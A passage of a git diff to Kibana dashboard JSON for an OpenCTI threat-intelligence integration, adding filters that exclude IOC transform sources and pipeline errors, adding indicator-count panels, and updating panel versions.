{ + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "9ac32596-4ad4-43ae-b5f5-76acff8f10c4": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Ingested", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "event.ingested" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "e8906063-eeca-4fc1-adb0-6cbeb2e41dcb", + "key": "labels.is_ioc_transform_source", + "negate": false, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.dataset", + "index": "87a3a6b8-64bf-4f2a-a150-63d9451872d7", + "key": "event.dataset", + "negate": false, + "params": { + "query": "ti_opencti.indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "ti_opencti.indicator" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "7a98f087-f10a-4e9e-b976-19f3106ffc06" + ], + "colorMapping": { + "assignmentMode": "manual", + "assignments": [ + { + "color": { + "colorIndex": 9, + "paletteId": "eui_amsterdam_color_blind", + "type": "categorical" + }, + "rule": { + "type": "matchExactly", + "values": [ + "pipeline_error" + ] + }, + "touched": true + }, + { + "color": { + "colorIndex": 0, + "paletteId": "eui_amsterdam_color_blind", + "type": "categorical" + }, + "rule": { + "type": "matchExactly", + "values": [ + "enrichment" + ] + 
}, + "touched": true + } + ], + "colorMode": { + "type": "categorical" + }, + "paletteId": "eui_amsterdam_color_blind", + "specialAssignments": [ + { + "color": { + "colorIndex": 1, + "paletteId": "neutral", + "type": "categorical" + }, + "rule": { + "type": "other" + }, + "touched": false + } + ] + }, + "layerId": "71b1d087-bce6-4500-b278-55cc0b095db1", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "18405c62-12ca-4f52-9dd4-44841611dc48", + "xAccessor": "9ac32596-4ad4-43ae-b5f5-76acff8f10c4" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 13, + "i": "2381f558-738c-4609-93ac-eb2bec084210", + "w": 38, + "x": 10, + "y": 0 + }, + "panelIndex": "2381f558-738c-4609-93ac-eb2bec084210", + "title": "Source indicators by event kind (may be superseded, revoked, or expired), logs-ti_opencti.indicator-*", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "71b1d087-bce6-4500-b278-55cc0b095db1": { + "columnOrder": [ + "18405c62-12ca-4f52-9dd4-44841611dc48", + "9ac32596-4ad4-43ae-b5f5-76acff8f10c4", + "7a98f087-f10a-4e9e-b976-19f3106ffc06" + ], + "columns": { + "18405c62-12ca-4f52-9dd4-44841611dc48": { + "dataType": "string", + "isBucketed": true, + "label": "Top 11 values of threat.indicator.type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": 
false, + "missingBucket": true, + "orderBy": { + "columnId": "7a98f087-f10a-4e9e-b976-19f3106ffc06", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 11 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.type" + }, + "7a98f087-f10a-4e9e-b976-19f3106ffc06": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Indicators", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "9ac32596-4ad4-43ae-b5f5-76acff8f10c4": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Ingested", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "event.ingested" + } + }, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "textBased": { + "layers": {} + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "fb055c1d-215d-4df5-9088-83462697c531", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "956c40e1-cde4-4036-a27c-1dfc83403ba5", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.dataset", + "index": 
"87a3a6b8-64bf-4f2a-a150-63d9451872d7", + "key": "event.dataset", + "negate": false, + "params": { + "query": "ti_opencti.indicator" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "ti_opencti.indicator" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "7a98f087-f10a-4e9e-b976-19f3106ffc06" + ], + "layerId": "71b1d087-bce6-4500-b278-55cc0b095db1", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "18405c62-12ca-4f52-9dd4-44841611dc48", + "xAccessor": "9ac32596-4ad4-43ae-b5f5-76acff8f10c4" + } + ], + "legend": { + "isVisible": true, + "position": "right" + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 13, + "i": "2fe03a23-200b-4a62-b35e-3a23f634f836", + "w": 38, + "x": 10, + "y": 26 + }, + "panelIndex": "2fe03a23-200b-4a62-b35e-3a23f634f836", + "title": "Latest indicators by type (current and valid), logs-ti_opencti_latest.indicator", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Logs OpenCTI] Ingestion", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-01-16T10:40:44.826Z", + "id": "ti_opencti-274cda10-b452-11ee-9ed7-19d912c01624", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "aeb2eb33-9329-4f94-ba7e-5ca920428cd0:indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2381f558-738c-4609-93ac-eb2bec084210:indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"2fe03a23-200b-4a62-b35e-3a23f634f836:indexpattern-datasource-layer-71b1d087-bce6-4500-b278-55cc0b095db1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_782a85c3-7390-40db-831f-1de57a7ab792:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_9c11483b-80c0-47b0-9c38-049b35d37c32:optionsListDataView", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_opencti/kibana/dashboard/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd.json b/packages/ti_opencti/kibana/dashboard/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd.json index dbead28f6de..7846abbc466 100644 --- a/packages/ti_opencti/kibana/dashboard/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd.json +++ b/packages/ti_opencti/kibana/dashboard/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd.json 
@@ -24,46 +24,10 @@ "useMargins": true }, "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "### Navigation\n\n**[OpenCTI Overview](/app/dashboards#/view/ti_opencti-83b2bef0-591c-11ee-ba5f-49a63bb985cd)** \n[OpenCTI Tags \u0026 Quality](/app/dashboards#/view/ti_opencti-0628df00-5958-11ee-ba5f-49a63bb985cd)\n\n[Integrations Page](/app/integrations/detail/ti_opencti/overview)\n\n### Overview\n\nThis dashboard provides an overview of indicator data ingested by the OpenCTI integration.\n\nIt also provides breakdowns by provider and indicator type.\n\nThe availability of fields that are specific to particular indicator types can be understood by looking at the \"No oberservables data\" and \"No ECS indicator detail\" metrics. When an indicator in OpenCTI has any related observable object, details from the observable will be stored, and whenever possible, copied to relevant ECS fields.", - "openLinksInNewTab": false - }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 39, - "i": "9457bd9b-5ac6-4ca1-a220-b88f783d1587", - "w": 10, - "x": 0, - "y": 0 - }, - "panelIndex": "9457bd9b-5ac6-4ca1-a220-b88f783d1587", - "type": "visualization", - "version": "8.7.1" - }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -72,7 +36,17 @@ }, { "id": "logs-*", - "name": "5131be68-a318-4ea6-b0d3-ff13d60a044b", + "name": "d958d904-2e66-47f9-835d-d7d4274bba60", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "f128baf7-1873-4c4f-ac59-6babd6b3570c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e74cb15a-9673-4c5d-ab61-eef4b0d6e122", "type": "index-pattern" } ], 
@@ -117,7 +91,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "5131be68-a318-4ea6-b0d3-ff13d60a044b", + "index": "d958d904-2e66-47f9-835d-d7d4274bba60", "key": "event.dataset", "negate": false, "params": { @@ -130,6 +104,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "f128baf7-1873-4c4f-ac59-6babd6b3570c", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "e74cb15a-9673-4c5d-ab61-eef4b0d6e122", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -160,11 +178,12 @@ "panelIndex": "bfdc79c8-e578-4778-b1e0-ef06c7c10a3a", "title": "Providers", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -173,7 +192,17 @@ }, { "id": "logs-*", - "name": "914c9b0f-b5f0-4297-9bc3-464839e5f655", + "name": "a87bb3c1-70cd-4f25-bff2-522111d3594f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "15cc137c-faac-4c2b-8839-443fcf171187", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a0f30b01-9408-4857-b68b-23210efa7594", "type": "index-pattern" } ], @@ -218,7 +247,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "914c9b0f-b5f0-4297-9bc3-464839e5f655", + "index": "a87bb3c1-70cd-4f25-bff2-522111d3594f", "key": "event.dataset", "negate": false, "params": { 
@@ -231,6 +260,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "15cc137c-faac-4c2b-8839-443fcf171187", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "a0f30b01-9408-4857-b68b-23210efa7594", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -261,11 +334,12 @@ "panelIndex": "d6bcf611-47b6-4470-a3f4-1627237dafec", "title": "Indicators", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -274,7 +348,17 @@ }, { "id": "logs-*", - "name": "e43361e4-f810-40fb-aab2-c35c5aefce8c", + "name": "06326156-48e6-48bc-a6e4-1dd5bc5995d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4df969ba-a380-437b-8668-2163cc9da588", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9fc159c5-2720-47d9-bed0-105dbbee75c5", "type": "index-pattern" } ], @@ -323,7 +407,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "e43361e4-f810-40fb-aab2-c35c5aefce8c", + "index": "06326156-48e6-48bc-a6e4-1dd5bc5995d9", "key": "event.dataset", "negate": false, "params": { 
@@ -336,6 +420,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "4df969ba-a380-437b-8668-2163cc9da588", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "9fc159c5-2720-47d9-bed0-105dbbee75c5", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -366,7 +494,7 @@ "panelIndex": "1768437b-561b-4346-8d9f-9194ce3ea104", "title": "Indicators", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { @@ -380,7 +508,17 @@ }, { "id": "logs-*", - "name": "5adfe022-e45e-4f3c-be23-7a888352b091", + "name": "39604f43-aabf-4abd-ae6d-f63d5990afe4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7bef3ba6-908e-42c7-b783-dee88aa984e4", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e148e4b0-9ea8-426e-9bb2-cf09d8576934", "type": "index-pattern" } ], @@ -445,7 +583,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "5adfe022-e45e-4f3c-be23-7a888352b091", + "index": "39604f43-aabf-4abd-ae6d-f63d5990afe4", "key": "event.dataset", "negate": false, "params": { 
@@ -458,6 +596,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "7bef3ba6-908e-42c7-b783-dee88aa984e4", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "e148e4b0-9ea8-426e-9bb2-cf09d8576934", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -489,7 +671,7 @@ "panelIndex": "d9612960-6f48-4cd5-9e90-935f9104cff4", "title": "Indicators", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { @@ -503,7 +685,17 @@ }, { "id": "logs-*", - "name": "6205c2b0-b0ff-4cd5-82fa-fce956dfcb62", + "name": "6f3addee-bc85-4c90-8833-4bba92c2cab8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4734d596-5593-4e0a-934f-fa5220511c35", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4b974280-cf5e-4b9a-b791-967579a4b637", "type": "index-pattern" } ], @@ -573,7 +765,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "6205c2b0-b0ff-4cd5-82fa-fce956dfcb62", + "index": "6f3addee-bc85-4c90-8833-4bba92c2cab8", "key": "event.dataset", "negate": false, "params": { 
@@ -586,6 +778,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "4734d596-5593-4e0a-934f-fa5220511c35", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "4b974280-cf5e-4b9a-b791-967579a4b637", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -631,11 +867,12 @@ "panelIndex": "cfa3f9f1-28c7-44f1-a91d-d1822d34d870", "title": "Indicators by provider", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -644,7 +881,17 @@ }, { "id": "logs-*", - "name": "4d21dc65-7171-4d32-bd09-c2cd0c802410", + "name": "482b8572-524f-49a5-a143-57047f20d2a3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9a70ca5b-4947-413d-9646-afd2d77296f9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "57847309-3c4e-44a5-8167-8f069fbf4850", "type": "index-pattern" } ], @@ -715,7 +962,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "4d21dc65-7171-4d32-bd09-c2cd0c802410", + "index": "482b8572-524f-49a5-a143-57047f20d2a3", "key": "event.dataset", "negate": false, "params": { 
@@ -728,18 +975,62 @@ "event.dataset": "ti_opencti.indicator" } } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "layerId": "71b1d087-bce6-4500-b278-55cc0b095db1", + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "9a70ca5b-4947-413d-9646-afd2d77296f9", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "57847309-3c4e-44a5-8167-8f069fbf4850", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "71b1d087-bce6-4500-b278-55cc0b095db1", "layerType": "data", "legendDisplay": "default", "metrics": [ @@ -772,11 +1063,12 @@ "panelIndex": "ac0a7cf5-0c62-4896-8935-ebc00c94e8fa", "title": "Indicators by type", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -785,7 +1077,17 @@ }, { "id": "logs-*", - "name": "22fe9f85-a46b-40bd-b670-9a1ca58f6c85", + "name": "8e63b1e7-d256-4a41-90bd-3153d600965c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ce2fbb75-d839-4e31-bafb-5ab61eacd8b8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "61e09305-5c8d-4792-bbd3-7f0d44d6c787", "type": "index-pattern" } ], 
@@ -830,7 +1132,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "22fe9f85-a46b-40bd-b670-9a1ca58f6c85", + "index": "8e63b1e7-d256-4a41-90bd-3153d600965c", "key": "event.dataset", "negate": false, "params": { @@ -843,6 +1145,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "ce2fbb75-d839-4e31-bafb-5ab61eacd8b8", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "61e09305-5c8d-4792-bbd3-7f0d44d6c787", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -877,11 +1223,12 @@ "panelIndex": "fbf92495-4189-4b4a-9658-f21a129f6c61", "title": "Providers", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -890,7 +1237,17 @@ }, { "id": "logs-*", - "name": "f1983067-4b63-4ac8-a461-8a78fbd9473f", + "name": "7294212a-1593-4d40-9dc2-806ccd46f08f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "4a5daa1c-8c0e-49e7-a6e1-37076e7b8465", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "7349ab95-9a05-458c-939d-3e47d01a302f", "type": "index-pattern" } ], @@ -935,7 +1292,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "f1983067-4b63-4ac8-a461-8a78fbd9473f", + "index": "7294212a-1593-4d40-9dc2-806ccd46f08f", "key": "event.dataset", "negate": false, "params": { 
@@ -948,6 +1305,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "4a5daa1c-8c0e-49e7-a6e1-37076e7b8465", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "7349ab95-9a05-458c-939d-3e47d01a302f", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -982,11 +1383,12 @@ "panelIndex": "356247a9-56a9-40e2-b965-d30697b9d352", "title": "Indicators", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -995,7 +1397,17 @@ }, { "id": "logs-*", - "name": "ead48616-9d2d-4c33-9385-804b685d6a36", + "name": "8a675c52-4bf2-4d8d-8c31-17dd7efe3ed1", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "58cef302-fe2e-41a6-9e3d-2a7dc474f4a3", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "df7b758f-bdbf-401f-9c90-ffb85e97c0e0", "type": "index-pattern" } ], @@ -1022,6 +1434,7 @@ "format": { "id": "percent", "params": { + "compact": true, "decimals": 2 } }, @@ -1107,7 +1520,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "ead48616-9d2d-4c33-9385-804b685d6a36", + "index": "8a675c52-4bf2-4d8d-8c31-17dd7efe3ed1", "key": "event.dataset", "negate": false, "params": { 
@@ -1120,6 +1533,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "58cef302-fe2e-41a6-9e3d-2a7dc474f4a3", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "df7b758f-bdbf-401f-9c90-ffb85e97c0e0", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -1150,11 +1607,12 @@ "panelIndex": "d2267d11-6549-45b4-9fdc-a386e0315a61", "title": "% of Indicators", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -1163,7 +1621,17 @@ }, { "id": "logs-*", - "name": "e00f2f4b-df3c-4691-a7e4-b15f59296698", + "name": "d26b8155-87a7-41fc-af12-d35f67e7be1e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b61f81e6-f978-427e-a178-3d171c1b3fbe", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "09a0dcdd-ec16-42a0-85c1-458fa441e030", "type": "index-pattern" } ], @@ -1190,6 +1658,7 @@ "format": { "id": "percent", "params": { + "compact": true, "decimals": 2 } }, @@ -1275,7 +1744,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "e00f2f4b-df3c-4691-a7e4-b15f59296698", + "index": "d26b8155-87a7-41fc-af12-d35f67e7be1e", "key": "event.dataset", "negate": false, "params": { 
@@ -1288,6 +1757,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "b61f81e6-f978-427e-a178-3d171c1b3fbe", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "09a0dcdd-ec16-42a0-85c1-458fa441e030", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -1318,11 +1831,12 @@ "panelIndex": "7f6b8ea1-278b-4846-8287-017b6cd3d11d", "title": "% of Indicators", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -1331,7 +1845,17 @@ }, { "id": "logs-*", - "name": "b4dd4b69-e286-4f84-95fa-227acb918a10", + "name": "87a3a6b8-64bf-4f2a-a150-63d9451872d7", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "2262e58c-3592-4071-8532-e74c01701ba0", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a189dc93-499b-44d8-863f-fd86b64beb7d", "type": "index-pattern" } ], @@ -1417,7 +1941,7 @@ "alias": null, "disabled": false, "field": "event.dataset", - "index": "b4dd4b69-e286-4f84-95fa-227acb918a10", + "index": "87a3a6b8-64bf-4f2a-a150-63d9451872d7", "key": "event.dataset", "negate": false, "params": { 
@@ -1430,6 +1954,50 @@ "event.dataset": "ti_opencti.indicator" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "index": "2262e58c-3592-4071-8532-e74c01701ba0", + "key": "labels.is_ioc_transform_source", + "negate": true, + "params": { + "query": "true" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "labels.is_ioc_transform_source": "true" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "event.kind", + "index": "a189dc93-499b-44d8-863f-fd86b64beb7d", + "key": "event.kind", + "negate": true, + "params": { + "query": "pipeline_error" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.kind": "pipeline_error" + } + } } ], "internalReferences": [], @@ -1478,11 +2046,12 @@ "panelIndex": "f789b019-a02c-47f1-bfe2-e3ff61d324c2", "title": "Indicators by provider", "type": "lens", - "version": "8.7.1" + "version": "8.10.1" }, { "embeddableConfig": { "attributes": { + "description": "", "references": [ { "id": "logs-*", @@ -1491,7 +2060,17 @@ }, { "id": "logs-*", - "name": 